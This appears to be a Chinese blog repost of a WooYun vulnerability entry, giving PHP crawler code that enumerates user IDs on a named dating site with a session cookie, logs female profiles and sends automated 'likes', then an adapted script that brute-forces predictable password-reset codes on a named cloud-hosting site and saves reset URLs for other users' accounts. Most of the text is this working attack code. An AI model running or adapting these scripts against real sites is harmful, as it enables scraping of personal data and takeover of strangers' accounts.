乌云漏洞编号:

WooYun-2014-68061

作者:hkAssassin

爬虫程序源码:

<?php

      header("content-type:text/html;charset=utf-8");

id();   //爬虫开始

function id(){

     for($i=1;$i<1000;$i++){

       send($i);

     if($i==410){

     exit;

     }

     }

     }

function send($id){     

       $fp = fsockopen("xq.ibaihe.com",80,$errno,$errstr,30);

/*fsockopen()将返回一个文件句柄,之后可以被其他文件类函数调用(例如:fgets(),fgetss(),fwrite(),fclose()还有feof())。如果调用失败,将返回FALSE。*/

      if(!$fp){

       echo "$errstr ($errno)<br />\n"; //返回错误信息

      }else{  

      //$header = "GET /person?userId=108  HTTP/1.1\r\n";

      $header = "GET /person?userId=".$id."  HTTP/1.1\r\n";

       $header.="Accept: text/html, application/xhtml+xml, */*\r\n";

       $header.="Accept-Language: zh-CN \r\n";

       $header.="User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko \r\n";

      $header .= "Host:xq.ibaihe.com \r\n";

            $header .= "DNT: 1 \r\n";

            $header .= "Cookie: Hm_lpvt_887bcaca634b40591b6e9953c168af21=1404958550; Hm_lvt_887bcaca634b40591b6e9953c168af21=1404955780; XQAuthCookie=******(这里为你自己的登陆cookie) \r\n";

            $header .= "Connection: Close\r\n\r\n";

            fwrite($fp,$header);

            /*fwrite() 返回写入的字符数,出现错误时则返回 FALSE 。*/

           $status = stream_get_meta_data($fp);

           /*stream_get_meta_data — 从封装协议文件指针中取得报头/元数据

           array stream_get_meta_data ( int $fp )

           */

     if(!$status['timed_out']) {

     /*timed_out (bool) - 如果在上次调用 fread() 或者 fgets() 中等待数据时流超时了则为 TRUE。*/ 

                 while (!feof($fp)) {

        /*feof — 测试文件指针是否到了文件结束的位置

        bool feof ( resource $handle )测试文件指针是否到了文件结束的位。handle

文件指针必须是有效的,必须指向由 fopen() 或 fsockopen() 成功打开的文件(并还未由 fclose() 关闭)

如果文件指针到了 EOF 或者出错时则返回 TRUE,否则返回一个错误(包括 socket 超时),其它情况则返回 FALSE。。*/

        if(($header = @fgets($fp)) && ($header == "\r\n" ||  $header == "\n")) {

/*fgets — 从文件指针中读取一行从指针 handle 指向的文件中读取了 length - 1 字节后返回字符串。 如果文件指针中没有更多的数据了则返回 FALSE。

错误发生时返回 FALSE。*/

                         break;     

                     }     

                 }             

                 $stop = false;     

                 while(!feof($fp) && !$stop) {     

                     $data = fread($fp,8192);

/*fread — 读取文件(可安全用于二进制文件)fread() 从文件指针 handle 读取最多 length 个字节。 该函数在遇上以下几种情况时停止读取文件:*/

                     $return .= $data;   

                 }     

             }  

$str1='女士';

$str2='她';

$po1=stripos($return,$str1);

$po2=stripos($return,$str2);

/*stripos — 查找字符串首次出现的位置(不区分大小写)int stripos ( string $haystack , string $needle [, int $offset = 0 ] )返回 needle 存在于 haystack 字符串开始的位置(独立于偏移量)。同时注意字符串位置起始于 0,而不是 1。

如果未发现 needle 将返回 FALSE。*/

if($po1!=false|| $po2!=false){

$url="http://xq.ibaihe.com/person?userId=".$id."\r\n";

  $fopen=fopen("bh.txt","a");

/*fopen — 打开文件或者 URL写入方式打开,'a'将文件指针指向文件末尾。如果文件不存在则尝试创建之。*/

  fwrite($fopen,$url);

  sendLike($id);

}

 } 

       fclose($fp);

      }   //send end

function sendLike($id){     

       $fp = fsockopen("xq.ibaihe.com",80,$errno,$errstr,30);

      if(!$fp){

       echo "$errstr ($errno)<br />\n";

      }else{  

      //$header = "GET /person?userId=108  HTTP/1.1\r\n";

      $header = "POST /enjoy/  HTTP/1.1\r\n";

       $header.="Accept: application/json, text/javascript, */*; q=0.01 \r\n";

       $header.="Content-Type: application/x-www-form-urlencoded; charset=UTF-8 \r\n";

       $header.="X-Requested-With: XMLHttpRequest \r\n";

       $header.="Referer: http://xq.ibaihe.com/person?userId=".$id." \r\n";

       $header.="Accept-Language: zh-CN \r\n";

       $header.="Accept-Encoding: gzip, deflate \r\n";

       $header.="User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko \r\n";

      $header .= "Host:xq.ibaihe.com \r\n";

      $header .="Content-Length: 19 \r\n";

            $header .= "DNT: 1 \r\n";

      $hrader .="Proxy-Connection: Keep-Alive \r\n";

      $header.="Pragma: no-cache \r\n";

            $header .= "Cookie: Hm_lpvt_887bcaca63*******4b40591b6e9953c168af21=1404958550; Hm_lvt_887bcaca634b40591b6e9953c168af21=1404955780; XQAuthCookie=*********(这里写你自己的登陆cookie)\r\n\r\n";

      $header .="type=like&oppId=".$id;

            $header .= "Connection: Close\r\n\r\n";

            fwrite($fp,$header);

           while(!feof($fp)){

        $res_str.=fgets($fp,512);

       }

       fclose($fp);

       var_dump($res_str);

/*var_dump — 打印变量的相关信息*/

      }  

}   //sendLike end

现学现用:

参照以上程序,我针对AAA云服务器网进行了一个爬虫,爬取了一部分注册用户的信息

<?php

	header("content-type:text/html;charset=utf-8");

	code();

	function code()

	{

		for($i=100000;$i<103000;$i++)

		{

			send($i);

			if($i==102000)

			{

				exit;

			}

		}

	}

	function send($id)

	{

		$fp = fsockopen("www.aaayun.com",80,$errno,$errstr,30);

		if(!$fp)

		{

			echo "$errstr ($errno)<br/>\n";

		}

		else

		{

			$header = "GET /members/user_reset.php?code=jggsrlrmlyxhnjuyympt_".$id." HTTP/1.1\r\n";

			$header .= "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";

			$header .= "Accept-Language:zh-CN \r\n";

			$header .= "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.66 Safari/537.36 LBBROWSER\r\n";

			$header .= "HOST:www.aaayun.com\r\n";

			$header .= "Cookie:AJSTAT_ok_times=; __login_user_ssid=nmb1fer1dqs8jl6vpid7ogsjd6; visitReferDomain=www.baidu.com; PHPSESSID=nmb1fer1dqs8jl6vpid7ogsjd6; AJSTAT_ok_pages=9; AJSTAT_ok_times=NaN\r\n";

			$header.="Connection: Close\r\n";

			fwrite($fp,$header);

			$status = stream_get_meta_data($fp);

			if(!$status['time_out'])

			{

				while(!feof($fp))

				{

					if(($header = @fgets($fp)) && ($header == "\r\n") || $header == "\n")

						break;

				}

			}

			$stop = false;

			while(!feof($fp) && !$stop)

			{

				$data = fread($fp,7388);

				$return .= $data;

			}

		}

		$str1 = '请输入新的登录密码';

		$po1 = stripos($return,$str1);

		if($po1 != false)

		{

			$url = "http://www.aaayun.com/members/user_reset.php?code=jggsrlrmlyxhnjuyympt_".$id."\r\n";

			$fopen = fopen("bh.txt","a");

			fwrite($fopen,$url);

		}

		fclose($fp);

	}

?>

某个php爬虫程序分析--来自wooyun的更多相关文章

  1. python爬虫程序

    http://blog.csdn.net/pleasecallmewhy/article/details/8922826 此人的博客关于python爬虫程序分析得很好!

  2. 一个简单的python爬虫程序

    python|网络爬虫 概述 这是一个简单的python爬虫程序,仅用作技术学习与交流,主要是通过一个简单的实际案例来对网络爬虫有个基础的认识. 什么是网络爬虫 简单的讲,网络爬虫就是模拟人访问web ...

  3. 我的第一个爬虫程序:利用Python抓取网页上的信息

    题外话 我第一次听说Python是在大二的时候,那个时候C语言都没有学好,于是就没有心思学其他的编程语言.现在,我的毕业设计要用到爬虫技术,在网上搜索了一下,Python语言在爬虫技术这方面获得一致好 ...

  4. python爬虫之分析Ajax请求抓取抓取今日头条街拍美图(七)

    python爬虫之分析Ajax请求抓取抓取今日头条街拍美图 一.分析网站 1.进入浏览器,搜索今日头条,在搜索栏搜索街拍,然后选择图集这一栏. 2.按F12打开开发者工具,刷新网页,这时网页回弹到综合 ...

  5. python网络爬虫 - 如何伪装逃过反爬虫程序

    有的时候,我们本来写得好好的爬虫代码,之前还运行得Ok, 一下子突然报错了. 报错信息如下: Http 800 Internal internet error 这是因为你的对象网站设置了反爬虫程序,如 ...

  6. Scrapy:创建爬虫程序的方式

    Windows 10家庭中文版,Python 3.6.4,Scrapy 1.5.0, 在Scrapy中,建立爬虫程序或项目的方式有两种(在孤读过Scrapy的大部分文档后): 1.继承官方Spider ...

  7. Android网络爬虫程序(基于Jsoup)

    摘要:基于 Jsoup 实现一个 Android 的网络爬虫程序,抓取网页的内容并显示出来.写这个程序的主要目的是抓取海投网的宣讲会信息(公司.时间.地点)并在移动端显示,这样就可以随时随地的浏览在学 ...

  8. 一个简单的C#爬虫程序

    这篇这篇文章主要是展示了一个C#语言如何抓取网站中的图片.实现原理就是基于http请求.C#给我们提供了HttpWebRequest和WebClient两个对象,方便发送请求获取数据,下面看如何实 1 ...

  9. 简单的爬虫程序以及使用PYQT进行界面设计(包含源码解析)

    由于这个是毕业设计的内容,而且还是跨专业的.爬虫程序肯定是很简单的,就是调用Yahoo的API进行爬取图片.这篇博客主要讲的是基础的界面设计. 放上源码,然后分部解析一下重要的地方.注:flickra ...

随机推荐

  1. 经验总结20--C#模拟WEB请求

    非常多语言能够使用代码进行WEB请求,获取到须要的数据. 方便调用别人的接口,自己进行处理. HttpWebRequest request = WebRequest.Create(url) as Ht ...

  2. Dubbo+Zookeeper视频教程

    http://www.roncoo.com/course/view/f614343765bc4aac8597c6d8b38f06fd#boxTwo

  3. 【BZOJ3417】Poi2013 Tales of seafaring 分层图BFS

    [BZOJ3417]Poi2013 Tales of seafaring Description 一个n点m边无向图,边权均为1,有k个询问 每次询问给出(s,t,d),要求回答是否存在一条从s到t的 ...

  4. js如何计算当前日期的前一个月和后一个月?

    <div class="query_title_div"><img src="../../images/task/before.png"/&g ...

  5. powerdesigner 修改name时code不修改

    o

  6. 160531、SQL优化-索引

    SQL优化有很多方法,今天来说一说数据库索引. 举例说明: 假设有一个图书Book表,里面有字段id,name, isbn等.如果图书数量巨大的话,我们通过isbn查询通常是比较慢的. 添加数据库索引 ...

  7. 一百本英文原著之旅 ( 15 finished )

    记得去年毕业的时候,突然想看英文原著(小说.文学.技术 etc.)来提高自己的英文水平.并且那时候愣愣的有了个宏伟的目标 --> 一百本.  不过也就去年下半年断断续续的看了些页数在200左右的 ...

  8. Client IP Address Client Identification

    HTTP The Definitive Guide Early web pioneers tried using the IP address of the client as a form of i ...

  9. VI乱码, cat 和 more正常

    今天在做一个东西的时候发现,vi乱码,cat,more这个文件汉字显示也正常,查了网上很多东西最后发现按一种说法改对了: 应该是格式化的问题! 比如man手册的文件有一些格式标记,你用man   ,c ...

  10. 前端开发 - JQuery&Bootstrap - 总结

    一.JavaScript和Jquery的区别 1.javascript的缺点: 1.书写繁琐,代码量大 2.代码复杂 3.动画效果,很难实现.使用定时器 各种操作和处理 2.定义: 1.Javascr ...